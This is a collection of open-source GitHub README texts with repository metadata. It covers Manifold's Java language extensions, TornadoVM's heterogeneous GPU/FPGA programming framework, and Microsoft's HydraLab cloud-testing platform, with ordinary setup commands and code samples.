incorporate units and precise measurements into your applications. ```java import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc. ... Velocity rate = 65mph; Time time = 1min + 3.7sec; Length distance = rate * time; ``` ### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers a simple and convenient way to support multiple build targets with a single codebase. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/preprocessor.mp4) ```java #if JAVA_8_OR_LATER @Override public void setTime(LocalDateTime time) {...} #else @Override public void setTime(Calendar time) {...} #endif ``` ### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural) Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/structural%20typing.mp4) ```java Map<String, Object> map = new HashMap<>(); MyThingInterface thing = (MyThingInterface) map; // O_o thing.setFoo(new Foo()); Foo foo = thing.getFoo(); out.println(thing.getClass()); // prints "java.util.HashMap" ``` ### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak) Access private features with <b>@Jailbreak</b> to avoid the drudgery and vulnerability of Java reflection. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/jailbreak.mp4) ```java @Jailbreak Foo foo = new Foo(); // Direct, *type-safe* access to *all* foo's members foo.privateMethod(x, y, z); foo.privateField = value; ``` ### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions) You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception swallowing. No more *try*/*catch*/*wrap*/*rethrow* boilerplate! ```java List<String> strings = ...; List<URL> urls = strings.stream() .map(URL::new) // No need to handle the MalformedURLException! .collect(Collectors.toList()); ``` ### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings) Inline variables and expressions in String literals, no more clunky string concat! [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/string_interpolation.mp4) ```java int hour = 15; // Simple variable access with '$' String result = "The hour is $hour"; // Yes!!! // Use expressions with '${}' result = "It is ${hour > 12 ? hour-12 : hour} o'clock"; ``` ### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) Author template files with the full expressive power of Java, use your templates directly in your code as types. Supports type-safe inclusion of other templates, shared layouts, and more. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/mantl.mp4) ```java List<User> users = ...; String content = abc.example.UserSample.render(users); ``` A template file *abc/example/UserSample.html.mtl* ```html <%@ import java.util.List %> <%@ import com.example.User %> <%@ params(List<User> users) %> <html lang="en"> <body> <% for(User user: users) { %> <% if(user.getDateOfBirth() != null) { %> User: ${user.getName()} <br> DOB: ${user.getDateOfBirth()} <br> <% } %> <% } %> </body> </html> ``` ## [IDE Support](https://github.com/manifold-systems/manifold) Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured template editing, integrated preprocessor, and more. <p><img src="http://manifold.systems/images/ManifoldPlugin.png" alt="manifold ij plugin" width="60%" height="60%"/></p> [Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold) ## [Projects](https://github.com/manifold-systems/manifold) The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided by the core framework. Each project consists of one or more **dependencies** you can easily add to your project: [Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)<br> [Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)<br> [Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)<br> [Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)<br> [Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)<br> [Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)<br> [Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)<br> [Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)<br> [Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)<br> [Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)<br> [Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)<br> [Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)<br> [Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)<br> [Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)<br> [Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)<br> [Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)<br> [Manifold : _String Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)<br> [Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)<br> [Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)<br> [Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)<br> [Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)<br> [Manifold : _I/0_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)<br> [Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)<br> >Experiment with sample projects:<br> >* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)<br> >* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)<br> >* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)<br> >* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)<br> >* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app) >* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project) >* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app) ## Platforms Manifold supports: * Java SE (8 - 21) * [Android](http://manifold.systems/android.html) * [Kotlin](http://manifold.systems/kotlin.html) (limited) Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio. ## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start a discussion, ask questions, provide feedback, etc. Someone is usually there to help. <br>
0
beehive-lab/TornadoVM
TornadoVM: A practical and efficient heterogeneous programming framework for managed languages
ai artificial-intelligence cuda fpga gpgpu gpu-acceleration gpu-computing gpus graalvm high-performance java java-library-acceleration level-zero-gpu-runtime levelzero multi-core opencl spirv tornadovm
# TornadoVM <img align="left" width="250" height="250" src="etc/tornadoVM_Logo.jpg"> TornadoVM is a plug-in to OpenJDK and GraalVM that allows programmers to automatically run Java programs on heterogeneous hardware. TornadoVM targets OpenCL, PTX and SPIR-V compatible devices which include multi-core CPUs, dedicated GPUs (Intel, NVIDIA, AMD), integrated GPUs (Intel HD Graphics and ARM Mali), and FPGAs (Intel and Xilinx). TornadoVM has three backends that generate OpenCL C, NVIDIA CUDA PTX assembly, and SPIR-V binary. Developers can choose which backends to install and run. ---------------------- **Website**: [tornadovm.org](https://www.tornadovm.org) **Documentation**: [https://tornadovm.readthedocs.io/en/latest/](https://tornadovm.readthedocs.io/en/latest/) For a quick introduction please read the following [FAQ](https://tornadovm.readthedocs.io/en/latest/). **Latest Release:** TornadoVM 1.0.3 - 27/03/2024 : See [CHANGELOG](https://tornadovm.readthedocs.io/en/latest/CHANGELOG.html). ---------------------- ## 1. Installation In Linux and macOS, TornadoVM can be installed automatically with the [installation script](https://tornadovm.readthedocs.io/en/latest/installation.html). For example: ```bash $ ./bin/tornadovm-installer usage: tornadovm-installer [-h] [--version] [--jdk JDK] [--backend BACKEND] [--listJDKs] [--javaHome JAVAHOME] TornadoVM Installer Tool. It will install all software dependencies except the GPU/FPGA drivers optional arguments: -h, --help show this help message and exit --version Print version of TornadoVM --jdk JDK Select one of the supported JDKs. Use --listJDKs option to see all supported ones. --backend BACKEND Select the backend to install: { opencl, ptx, spirv } --listJDKs List all JDK supported versions --javaHome JAVAHOME Use a JDK from a user directory ``` **NOTE** Select the desired backend: * `opencl`: Enables the OpenCL backend (requires OpenCL drivers) * `ptx`: Enables the PTX backend (requires NVIDIA CUDA drivers) * `spirv`: Enables the SPIRV backend (requires Intel Level Zero drivers) Example of installation: ```bash # Install the OpenCL backend with OpenJDK 21 $ ./bin/tornadovm-installer --jdk jdk21 --backend opencl # It is also possible to combine different backends: $ ./bin/tornadovm-installer --jdk jdk21 --backend opencl,spirv,ptx ``` Alternatively, TornadoVM can be installed either manually [from source](https://tornadovm.readthedocs.io/en/latest/installation.html#b-manual-installation) or by [using Docker](https://tornadovm.readthedocs.io/en/latest/docker.html). If you are planning to use Docker with TornadoVM on GPUs, you can also follow [these](https://github.com/beehive-lab/docker-tornado#docker-for-tornadovm) guidelines. You can also run TornadoVM on Amazon AWS CPUs, GPUs, and FPGAs following the instructions [here](https://tornadovm.readthedocs.io/en/latest/cloud.html). ## 2. Usage Instructions TornadoVM is currently being used to accelerate machine learning and deep learning applications, computer vision, physics simulations, financial applications, computational photography, and signal processing. Featured use-cases: - [kfusion-tornadovm](https://github.com/beehive-lab/kfusion-tornadovm): Java application for accelerating a computer-vision application using the Tornado-APIs to run on discrete and integrated GPUs. - [Java Ray-Tracer](https://github.com/Vinhixus/TornadoVM-Ray-Tracer): Java application accelerated with TornadoVM for real-time ray-tracing. We also have a set of [examples](https://github.com/beehive-lab/TornadoVM/tree/master/tornado-examples/src/main/java/uk/ac/manchester/tornado/examples) that includes NBody, DFT, KMeans computation and matrix computations. **Additional Information** - [General Documentation](https://tornadovm.readthedocs.io/en/latest/introduction.html) - [Benchmarks](https://tornadovm.readthedocs.io/en/latest/benchmarking.html) - [How TornadoVM executes reductions](https://tornadovm.readthedocs.io/en/latest/programming.html#parallel-reductions) - [Execution Flags](https://tornadovm.readthedocs.io/en/latest/flags.html) - [FPGA execution](https://tornadovm.readthedocs.io/en/latest/fpga-programming.html) - [Profiler Usage](https://tornadovm.readthedocs.io/en/latest/profiler.html) ## 3. Programming Model TornadoVM exposes to the programmer task-level, data-level and pipeline-level parallelism via a light Application Programming Interface (API). In addition, TornadoVM uses single-source property, in which the code to be accelerated and the host code live in the same Java program. Compute-kernels in TornadoVM can be programmed using two different approaches (APIs): #### a) Loop Parallel API Compute kernels are written in a sequential form (tasks programmed for a single thread execution). To express parallelism, TornadoVM exposes two annotations that can be used in loops and parameters: a) `@Parallel` for annotating parallel loops; and b) `@Reduce` for annotating parameters used in reductions. The following code snippet shows a full example to accelerate Matrix-Multiplication using TornadoVM and the loop-parallel API: ```java public class Compute { private static void mxmLoop(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { for (@Parallel int i = 0; i < size; i++) { for (@Parallel int j = 0; j < size; j++) { float sum = 0.0f; for (int k = 0; k < size; k++) { sum += A.get(i, k) * B.get(k, j); } C.set(i, j, sum); } } } public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { TaskGraph taskGraph = new TaskGraph("s0") .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution .task("t0", Compute::mxmLoop, A, B, C, size) // Each task points to an existing Java method .transferToHost(DataTransferMode.EVERY_EXECUTION, C); // Transfer data from device to host // Create an immutable task-graph ImmutableTaskGraph immutableTaskGraph = taskGraph.snaphot(); // Create an execution plan from an immutable task-graph TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph); // Execute the execution plan TorandoExecutionResult executionResult = executionPlan.execute(); } } ``` #### b) Kernel API Another way to express compute-kernels in TornadoVM is via the **kernel API**. To do so, TornadoVM exposes a `KernelContext` with which the application can directly access the thread-id, allocate memory in local memory (shared memory on NVIDIA devices), and insert barriers. This model is similar to programming compute-kernels in OpenCL and CUDA. Therefore, this API is more suitable for GPU/FPGA expert programmers that want more control or want to port existing CUDA/OpenCL compute kernels into TornadoVM. The following code-snippet shows the Matrix Multiplication example using the kernel-parallel API: ```java public class Compute { private static void mxmKernel(KernelContext context, Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { int idx = context.globalIdx int jdx = context.globalIdy; float sum = 0; for (int k = 0; k < size; k++) { sum += A.get(idx, k) * B.get(k, jdx); } C.set(idx, jdx, sum); } public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { // When using the kernel-parallel API, we need to create a Grid and a Worker WorkerGrid workerGrid = new WorkerGrid2D(size, size); // Create a 2D Worker GridScheduler gridScheduler = new GridScheduler("s0.t0", workerGrid); // Attach the worker to the Grid KernelContext context = new KernelContext(); // Create a context workerGrid.setLocalWork(32, 32, 1); // Set the local-group size TaskGraph taskGraph = new TaskGraph("s0") .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution .task("t0", Compute::mxmKernel, context, A, B, C, size) // Each task points to an existing Java method .transferToHost(DataTransferMode.EVERY_EXECUTION, C); // Transfer data from device to host // Create an immutable task-graph ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot(); // Create an execution plan from an immutable task-graph TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph); // Execute the execution plan executionPlan.withGridScheduler(gridScheduler) .execute(); } } ``` Additionally, the two modes of expressing parallelism (kernel and loop parallelization) can be combined in the same task graph object. ## 4. Dynamic Reconfiguration Dynamic reconfiguration is the ability of TornadoVM to perform live task migration between devices, which means that TornadoVM decides where to execute the code to increase performance (if possible). In other words, TornadoVM switches devices if it can detect that a specific device can yield better performance (compared to another). With the task-migration, the TornadoVM's approach is to only switch device if it detects an application can be executed faster than the CPU execution using the code compiled by C2 or Graal-JIT, otherwise it will stay on the CPU. So TornadoVM can be seen as a complement to C2 and Graal JIT compilers. This is because there is no single hardware to best execute all workloads efficiently. GPUs are very good at exploiting SIMD applications, and FPGAs are very good at exploiting pipeline applications. If your applications follow those models, TornadoVM will likely select heterogeneous hardware. Otherwise, it will stay on the CPU using the default compilers (C2 or Graal). To use the dynamic reconfiguration, you can execute using TornadoVM policies. For example: ```java // TornadoVM will execute the code in the best accelerator. executionPlan.withDynamicReconfiguration(Policy.PERFORMANCE, DRMode.PARALLEL) . execute(); ``` Further details and instructions on how to enable this feature can be found here. * Dynamic reconfiguration: [https://dl.acm.org/doi/10.1145/3313808.3313819](https://dl.acm.org/doi/10.1145/3313808.3313819) ## 5. How to Use TornadoVM in your Projects? To use TornadoVM, you need two components: a) The TornadoVM `jar` file with the API. The API is licensed as GPLV2 with Classpath Exception. b) The core libraries of TornadoVM along with the dynamic library for the driver code (`.so` files for OpenCL, PTX and/or SPIRV/Level Zero). You can import the TornadoVM API by setting this the following dependency in the Maven `pom.xml` file: ```xml <repositories> <repository> <id>universityOfManchester-graal</id> <url>https://raw.githubusercontent.com/beehive-lab/tornado/maven-tornadovm</url> </repository> </repositories> <dependencies> <dependency> <groupId>tornado</groupId> <artifactId>tornado-api</artifactId> <version>1.0.3</version> </dependency> <dependency> <groupId>tornado</groupId> <artifactId>tornado-matrices</artifactId> <version>1.0.3</version> </dependency> </dependencies> ``` To run TornadoVM, you need to either install the TornadoVM extension for GraalVM/OpenJDK, or run with our Docker [images](https://github.com/beehive-lab/docker-tornado). ## 6. Additional Resources [Here](https://tornadovm.readthedocs.io/en/latest/resources.html) you can find videos, presentations, tech-articles and artefacts describing TornadoVM, and how to use it. ## 7. Academic Publications If you are using **TornadoVM >= 0.2** (which includes the Dynamic Reconfiguration, the initial FPGA support and CPU/GPU reductions), please use the following citation: ```bibtex @inproceedings{Fumero:DARHH:VEE:2019, author = {Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Clarkson, James and Kotselidis, Christos}, title = {{Dynamic Application Reconfiguration on Heterogeneous Hardware.}}, booktitle = {Proceedings of the 15th ACM SIGPLAN/SIGOPS International Conference on Virtual Execution Environments}, series = {VEE '19}, year = {2019}, doi = {10.1145/3313808.3313819}, publisher = {Association for Computing Machinery} } ``` If you are using **Tornado 0.1** (Initial release), please use the following citation in your work. ```bibtex @inproceedings{Clarkson:2018:EHH:3237009.3237016, author = {Clarkson, James and Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Kotselidis, Christos and Luj\'{a}n, Mikel}, title = {{Exploiting High-performance Heterogeneous Hardware for Java Programs Using Graal}}, booktitle = {Proceedings of the 15th International Conference on Managed Languages \& Runtimes}, series = {ManLang '18}, year = {2018}, isbn = {978-1-4503-6424-9}, location = {Linz, Austria}, pages = {4:1--4:13}, articleno = {4}, numpages = {13}, url = {http://doi.acm.org/10.1145/3237009.3237016}, doi = {10.1145/3237009.3237016}, acmid = {3237016}, publisher = {ACM}, address = {New York, NY, USA}, keywords = {Java, graal, heterogeneous hardware, openCL, virtual machine}, } ``` Selected publications can be found [here](https://tornadovm.readthedocs.io/en/latest/publications.html). ## 8. Acknowledgments This work is partially funded by [Intel corporation](https://www.intel.com/content/www/us/en/homepage.html). In addition, it has been supported by the following EU & UKRI grants (most recent first): - EU Horizon Europe & UKRI [AERO 101092850](https://cordis.europa.eu/project/id/101092850). - EU Horizon Europe & UKRI [INCODE 101093069](https://cordis.europa.eu/project/id/101093069). - EU Horizon Europe & UKRI [ENCRYPT 101070670](https://encrypt-project.eu). - EU Horizon Europe & UKRI [TANGO 101070052](https://tango-project.eu). - EU Horizon 2020 [ELEGANT 957286](https://www.elegant-h2020.eu/). - EU Horizon 2020 [E2Data 780245](https://e2data.eu). - EU Horizon 2020 [ACTiCLOUD 732366](https://acticloud.eu). Furthermore, TornadoVM has been supported by the following [EPSRC](https://www.ukri.org/councils/epsrc/) grants: - [PAMELA EP/K008730/1](http://apt.cs.manchester.ac.uk/projects/PAMELA/). - [AnyScale Apps EP/L000725/1](https://gow.epsrc.ukri.org/NGBOViewGrant.aspx?GrantRef=EP/L000725/1). ## 9. Contributions and Collaborations We welcome collaborations! Please see how to contribute to the project in the [CONTRIBUTING](CONTRIBUTING.md) page. ### Write your questions and proposals: Additionally, you can open new proposals on the GitHub discussions [page](https://github.com/beehive-lab/TornadoVM/discussions). Alternatively, you can share a Google document with us. ### Collaborations: For Academic & Industry collaborations, please contact [here](https://www.tornadovm.org/contact-us). ## 10. TornadoVM Team Visit our [website](https://tornadovm.org) to meet the [team](https://www.tornadovm.org/about-us). ## 11. Licenses To use TornadoVM, you can link the TornadoVM API to your application which is under Apache 2. Each Java TornadoVM module is licensed as follows: | Module | License | |--------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| | Tornado-API | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Runtime | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception | | Tornado-Assembly | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Drivers | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception | | Tornado-Drivers-OpenCL-Headers | [![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/KhronosGroup/OpenCL-Headers/blob/master/LICENSE) | | Tornado-scripts | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Annotation | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Unittests | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Benchmarks | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Examples | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | Tornado-Matrices | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) | | |
0
microsoft/HydraLab
Intelligent cloud testing made easy.
azure chatgpt cloud-testing cross-platform developer-tools device-farm e2e-testing mobile-development performance-testing platform-engineering spring-boot test-automation testgpt testing testing-framework ui-testing
<h1 align="center">Hydra Lab</h1> <p align="center">Build your own cloud testing infrastructure</p> <div align="center"> [中文(完善中)](README.zh-CN.md) [![Build Status](https://dlwteam.visualstudio.com/Next/_apis/build/status/HydraLab-CI?branchName=main)](https://dlwteam.visualstudio.com/Next/_build/latest?definitionId=743&branchName=main) ![Spring Boot](https://img.shields.io/badge/Spring%20Boot-v2.2.5-blue) ![Appium](https://img.shields.io/badge/Appium-v8.0.0-yellow) ![License](https://img.shields.io/badge/license-MIT-green) --- https://github.com/microsoft/HydraLab/assets/8344245/cefefe24-4e11-4cc7-a3af-70cb44974735 [What is Hydra Lab?](#what-is) | [Get Started](#get-started) | [Contribute](#contribute) | [Contact Us](#contact) | [Wiki](https://github.com/microsoft/HydraLab/wiki) </div> <span id="what-is"></span> ## What is Hydra Lab? As mentioned in the above video, Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines in hand. Capabilities of Hydra Lab include: - Scalable test device management under the center-agent distributed design; Test task management and test result visualization. - Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso), and Appium(Java) test on different platforms: Windows/iOS/Android/Browser/Cross-platform. - Case-free test automation: Monkey test, Smart exploratory test. For more details, you may refer to: - [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki) - [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41) <span id="get-started"></span> ## Get Started Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md). **Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)). **Supported platforms and frameworks matrix**: | | Appium(Java) | Espresso | XCTest | Maestro | Python Runner | | ---- |--------------|---- | ---- | ---- | --- | |Android| &#10004; | &#10004; | x | &#10004; | &#10004; | |iOS| &#10004; | x | &#10004; | &#10004; | &#10004; | |Windows| &#10004; | x | x | x | &#10004; | |Web (Browser)| &#10004; | x | x | x | &#10004; | <span id="quick-start"></span> ### Quick guide on out-of-box Uber docker image Hydra Lab offers an out-of-box experience of the Docker image, and we call it `Uber`. You can follow the below steps and start your docker container with both a center instance and an agent instance: **Step 1. Download and install [Docker](https://www.docker.com)** **Step 2. Download latest Uber Docker image** ```bash docker pull ghcr.io/microsoft/hydra-lab-uber:latest ``` **This step is necessary.** Without this step and jump to step 3, you may target at the local cached Docker image with `latest` tag if it exists. **Step 3. Run on your machine** By Default, Hydra Lab will use the local file system as a storage solution, and you may type the following in your terminal to run it: ```bash docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest ``` > We strongly recommend using [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it. **Step 3. Visit the web page and view your connected devices** > Url: http://localhost:9886/portal/index.html#/ (or your custom port). Enjoy starting your journey of exploration! **Step 4. Perform the test procedure with a minimal setup** Note: For Android, Uber image only supports **Espresso/Instrumentation** test. See the "User Manual" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki). **To run a test with Uber image and local storage:** - On the front-end page, go to the `Runner` tab and select `HydraLab Client`. - Click `Run` and change "Espresso test scope" to `Test app`, click `Next`. - Pick an available device, click `Next` again, and click `Run` to start the test. - When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page. ![Test trigger steps](docs/images/test-trigger-steps.png) ### Build and run Hydra Lab from the source You can also run the center java Spring Boot service (a runnable Jar) separately with the following commands: > The build and run process will require JDK11 | NPM | Android SDK platform-tools in position. **Step 1. Run Hydra Lab center service** ```bash # In the project root, switch to the react folder to build the Web front. cd react npm ci npm run pub # Get back to the project root, and build the center runnable Jar. cd .. # For the gradlew command, if you are on Windows please replace it with `./gradlew` or `./gradlew.bat` gradlew :center:bootJar # Run it, and then visit http://localhost:9886/portal/index.html#/ java -jar center/build/libs/center.jar # Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret. ``` > If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal. **Step 2. Run Hydra Lab agent service** ```bash # In the project root cd android_client # Build the Android client APK ./gradlew assembleDebug cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk # If you don't have the SDK for Android ,you can download the prebuilt APK in https://github.com/microsoft/HydraLab/releases # Back to the project root cd .. # In the project root, copy the sample config file and update the: # YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET. cp agent/application-sample.yml application.yml # Then build an agent jar and run it gradlew :agent:bootJar java -jar agent/build/libs/agent.jar ``` **Step 3. visit http://localhost:9886/portal/index.html#/ and view your connected devices** ### More integration guidelines: - [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup) - [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service) - [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container) <span id="contribute"></span> ## Contribute Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions. ### Contributor Hero Wall: <a href="https://github.com/Microsoft/hydralab/graphs/contributors"> <img src="https://contrib.rocks/image?repo=Microsoft/hydralab" /> </a> <span id="contact"></span> ## Contact Us You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us mails](mailto:hydra_lab_support@microsoft.com). <span id="ms-give"></span> ## Microsoft Give Sponsors Thank you for your contribution to [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab: [@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG) <span id="license-trademarks"></span> ## License & Trademarks The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE). This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party’s policies. We use the Microsoft Clarity Analysis Platform for front end client data dashboard, please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more. Instructions to turn off the Clarity: Open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment the line which call the initClarity(), and rebuild the Hydra Lab Client apk, repalce the one in the agent resources folder. [Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry)
0
psiegman/epublib
a java library for reading and writing epub files
null
